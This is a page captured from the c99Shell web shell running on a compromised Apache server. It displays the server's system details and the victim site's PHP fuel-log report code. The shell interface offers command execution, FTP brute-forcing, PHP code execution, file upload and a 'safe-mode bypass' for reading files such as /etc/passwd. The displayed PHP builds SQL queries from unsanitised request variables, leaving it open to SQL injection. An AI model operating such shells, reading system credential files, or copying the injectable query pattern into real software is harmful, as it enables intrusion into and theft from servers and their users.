!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     printCarDetail.php (11.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
	session_start();
	//header("Content-type: application/vnd.ms-excel");
    //header("Content-Disposition: attachment; filename=ideafunction_excel.xls");
	/**  Define Validate Access  */
	define( '_VALID_ACCESS', 1 );

	/**  Check Session User Login  */
	if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
		echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
		echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
		echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
	    require_once( "../includes/FunctionDB.php" );
			require_once( "../calendar/check.php" );
		/**  Create Database Object  */
		$dbObj = new DBConn;

		//=== SESSION
		
		$Username = $valid_user; 
		/**  Config Table for This Page  */
		$myTable1 = "personal_tb";
		$myTable2 = "formcaroffice";
		$myTable3 = "province";
		$myTable4 = "training_tb";
		
			
		/**  Table  -->  tech_plan_tb  */
		$query1 = " SELECT *  FROM $myTable2  WHERE   carId='$carId'  AND  Teacher_code='$Teacher_code'   ";
		$result1 = $dbObj->execQuery($query1);
		$rs1 = $dbObj->fetchArray($result1);
		// find เชื้อเพลิงง autocar_tb  
		$query11 = " SELECT *  FROM autocar_tb  WHERE   carId='$carId'    ";
		$result11 = $dbObj->execQuery($query11);
		$rs11 = $dbObj->fetchArray($result11);
		//--------------
		$query = " SELECT *  FROM  formcaroffice   Where  Teacher_code='$Teacher_code'  Group  By  CarNo ";
		$result = $dbObj->execQuery($query);
		$rs3 = $dbObj->fetchArray($result);
			//$Teacher_code = $rss['Teacher_code'];
		/**  Table  -->  techplan_method_tb  */
		  $query2 = " SELECT *  FROM $myTable3   WHERE   ProvinceId='$rs1[ProvinceId]'     ";
	      $result2 = $dbObj->execQuery($query2);
		   $rs2 = $dbObj->fetchArray($result2);
	} # else
 ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - แก้ไขข้อมูลแผนการสอน</title>
</head>
<table width="1056" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="1056" align="right">แบบ 4</td>
  </tr>
  <tr>
    <td height="26" align="center"><strong>บันทึกการใช้น้ำมันเชื้อเพลิง</strong></td>
  </tr>
  <tr>
    <td height="16" align="center">&nbsp;</td>
  </tr>
  <tr>
    <td height="25" align="center">ที่
      <?=$CarNo;?> &nbsp;&nbsp;
วันที่ขอใช้รถยนต์  &nbsp; วันที่
<?php 
	        	$query1 = " SELECT *  FROM  formcaroffice  WHERE  CarNo='$CarNo'   ";
		       $result1 = $dbObj->execQuery($query1);
		       $rs = $dbObj->fetchObject($result1);
				
				$sday = $rs->Date_start ;
				$yearthai = explode("-",$sday);
				$day = intval($yearthai[2]);
				$month = intval($yearthai[1]);
				$year = intval($yearthai[0]+543);	
				$m = getThaiSubMonth($month);
					echo "$day"." "."$m"." "."$year";
			?>  &nbsp;&nbsp;
สิ้นสุดวันที่
<?php 
				$sday = $rs->Date_finish;
				$yearthai = explode("-",$sday); 
				$day = intval($yearthai[2]);
				$month =  intval($yearthai[1]);
				$year = intval($yearthai[0]+543);	
				$m = getThaiSubMonth($month);
					echo "$day"." "."$m"." "."$year";
			?>&nbsp;&nbsp; เวลาออกเดินทาง &nbsp;<?=$rs->Time_start;?>&nbsp;&nbsp; ถึงสำนักงานเวลา <?=$rs->Time_finish ;?>  </td>
  </tr>
  <tr>
    <td height="25" align="center">ชื่อผู้ขอใช้&nbsp;
    <?php
					$Teacher_code =  $Teacher_code ;
					$sql11 = " Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code='$Teacher_code' ";
					$result11 = mysql_query($sql11);
					$rs11 = mysql_fetch_array($result11); 
						echo"$rs11[First_name]&nbsp;$rs11[Teacher_name]&nbsp; $rs11[Teacher_lastname]";
				 ?> &nbsp;&nbsp;ขออนุญาตใช้รถยนต์ไปราชการเพื่อ <?=$rs->Training_name ;?>&nbsp;&nbsp;จังหวัด <?php 
	            $query2 = " SELECT *  FROM $myTable3   WHERE  provinceId='$rs3[provinceId]'     ";
	             $result2 = $dbObj->execQuery($query2);
		        $rs2 = $dbObj->fetchArray($result2);
				  	echo $rs2[provinceName]; ?> </td>
  </tr>
  <tr>
    <td align="center">เลขวัดระยะที่หน้าปัทม์ 
    <?php         
				$sql = " SELECT  min(Mile_start)  Mile_start FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'         ";
				$result1 = mysql_query($sql);
				$rss = mysql_fetch_array($result1);
					echo $rss['Mile_start'] ; 
            ?>&nbsp;&nbsp;ถึงเลขวัดระยะที่หน้าปัทม 
    <?php         
				$sql = " SELECT  max(Mile_finish)  Mile_finish FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'         ";
				$result1 = mysql_query($sql);
				$rss = mysql_fetch_array($result1);
					echo $rss['Mile_finish'] ; 
            ?>&nbsp;&nbsp;&nbsp;&nbsp;จำนวนระยะทาง 
    <?php         
				$sql1 = " SELECT SUM(Num_Mile)  AS SumB4  FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'   ";
				$result1 = mysql_query($sql1);
				$rss1 = mysql_fetch_array($result1);
					echo $rss1['SumB4'];
            ?>&nbsp;&nbsp;&nbsp;&nbsp; จำนวนค่าเชื้อเพลิงครังนี้ 
    <?php         
				$sql1 = " SELECT SUM(Num_Lish)  AS SumB5  FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'   ";
				$result1 = mysql_query($sql1);
				$rss1 = mysql_fetch_array($result1);
					echo $rss1['SumB5'];
            ?> ลิตร &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;รวมเป็นเงิน 
    <?php         
				$sql1 = " SELECT SUM(PriceOill)  AS SumB5  FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'   ";
				$result1 = mysql_query($sql1);
				$rss1 = mysql_fetch_array($result1);
					echo number_format($rss1['SumB5'],2,'.',',');
            ?> บาท </td>
  </tr>
  <tr>
    <td align="center">&nbsp;</td>
  </tr>
  <tr>
    <td><table width="100%" border="1" align="center" cellpadding="1" cellspacing="0">
      <tr>
        <td width="4%" rowspan="2" align="center" valign="middle" bgcolor="#FFCCFF">ลำดับ<br />ที่</td>
        <td height="38" colspan="2" align="center" valign="middle" bgcolor="#FFCCFF">ออกเดินทาง</td>
        <td width="17%" rowspan="2" align="center" valign="middle" bgcolor="#FFCCFF">ทะเบียนรถยนต์</td>
        <td width="10%" rowspan="2" align="center" valign="middle" bgcolor="#FFCCFF">ระยะ กม./ไมล์<br />
          เมื่อรถออกเดินทาง</td>
        <td align="center" valign="middle" bgcolor="#FFCCFF">วันที่เติมน้ำมัน</td>
        <td width="11%" rowspan="2" align="center" valign="middle" bgcolor="#FFCCFF">ระยะ กม./ไมล์<br />
          เมื่อรถกลับกรม/<br />
          สำนักงาน</td>
        <td width="5%" rowspan="2" align="center" valign="middle" bgcolor="#FFCCFF">รวมระยะ <br />ทาง กม.</td>
        <td width="7%" rowspan="2" align="center" valign="middle" bgcolor="#FFCCFF">จำนวน<br />
        น้ำมันลิตร</td>
        <td width="15%" rowspan="2" align="center" valign="middle" bgcolor="#FFCCFF">พนักงานขับรถ</td>
      </tr>
      <tr>
        <td width="11%" height="18" align="center" valign="middle" bgcolor="#FFCCFF">วันที่</td>
        <td width="6%" align="center" valign="middle" bgcolor="#FFCCFF">เวลา</td>
        <td width="14%" align="center" valign="middle" bgcolor="#FFCCFF">&nbsp;</td>
        </tr>
          <?php
		         $query = " SELECT * FROM  autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'  ";
	        	 $result5 = $dbObj->execQuery($query);
        		  $numrows = $dbObj->_numrows;   
		       
				$no = 1+($display-1)*$limit;
		while( $rss = $dbObj->fetchArray($result5) ) { 
				$Budget_year = $rss['Budget_year'];
					$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          	?>
    <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
        <td height="20" align="center" >
          <?=$no;?>
       </td>
        <td align="center"><?php 
		        $sday = $rss['DateCar'];
				$yearthai = explode("-",$sday);
				$day = intval($yearthai[2]);
				$month =  intval($yearthai[1]);
				$year = intval($yearthai[0]+543);	 
				$m = getThaiSubMonth($month);
					echo "$day"." "."$m"." "."$year"; ?></td>
        <td align="center"><?=$rss['Time_start'];?> น.</td>
        <td align="center"><? 
   			$CarmoId = $rss["CarmoId"];
		      $sql = "Select * From   automobile_tb   Where CarmoId ='$CarmoId'";
              $result1 = mysql_query($sql) or die("Error".mysql_error());
		     $rs2 = mysql_fetch_array($result1);
          echo $rs2[CodeNo] ;

	?></td>
        <td align="center"><? echo  $rss['Mile_start'];?></td>
        <td align="center"><?php 
		          $query11 = " SELECT *  FROM autocar_tb  WHERE   carId='$rss[carId]'    ";
		          $result11 = $dbObj->execQuery($query11);
		         $rs11 = $dbObj->fetchArray($result11);
		      
			     $sday = $rs11['DateCar'];
				$yearthai = explode("-",$sday);
				$day = intval($yearthai[2]);
				$month =  intval($yearthai[1]);
				$year = intval($yearthai[0]+543);	 
				$m = getThaiSubMonth($month);
					echo "$day"." "."$m"." "."$year"; ?></td>
        <td align="center"><? echo  $rss['Mile_finish'];?></td>
        <td align="center"><? echo $rss['Num_Mile'];?></td>
        <td align="center"><? echo $rss['Num_Lish'];?></td>
        <td align="left"><?
				$name1  = $rss["name1"];
		      $sql = "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId  Where Teacher_code ='$name1'";
              $result1 = mysql_query($sql) or die("Error".mysql_error());
		     $rs2 = mysql_fetch_array($result1);
          echo "$rs2[First_name] $rs2[Teacher_name]&nbsp;&nbsp;$rs2[Teacher_lastname]";?></td>
          <?php
					$no++;
				} # while
          	?>
      </tr>
      <tr>
        <td colspan="4">&nbsp;</td>
        <td align="center"><?php         
				$sql = " SELECT  min(Mile_start)  Mile_start FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'         ";
				$result1 = mysql_query($sql);
				$rss = mysql_fetch_array($result1);
					echo $rss['Mile_start'] ; 
            ?></td>
        <td>&nbsp;</td>
        <td align="center"><?php         
				$sql = " SELECT  max(Mile_finish)  Mile_finish FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'         ";
				$result1 = mysql_query($sql);
				$rss = mysql_fetch_array($result1);
					echo $rss['Mile_finish'] ; 
            ?></td>
        <td align="center"><?php         
				$sql1 = " SELECT SUM(Num_Mile)  AS SumB4  FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'   ";
				$result1 = mysql_query($sql1);
				$rss1 = mysql_fetch_array($result1);
					echo $rss1['SumB4'];
            ?></td>
        <td align="center">
          <?php         
				$sql1 = " SELECT SUM(Num_Lish)  AS SumB5  FROM    autocar_tb at ,  formcaroffice fc   WHERE    at.carId=fc.carId     and    fc.CarNo='$CarNo'   ";
				$result1 = mysql_query($sql1);
				$rss1 = mysql_fetch_array($result1);
					echo $rss1['SumB5'];
            ?>
        </td>
        <td>&nbsp;</td>
      </tr>
    </table></td>
  </tr>
</table>
<?php
	/**  Free Resource */
	$dbObj->freeresult($result1);
	
	/**  Close the Database  */
	$dbObj->disconn();
	
	/**  Unset Class  */
	unset($dbObj);
?>
</p>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0051 ]--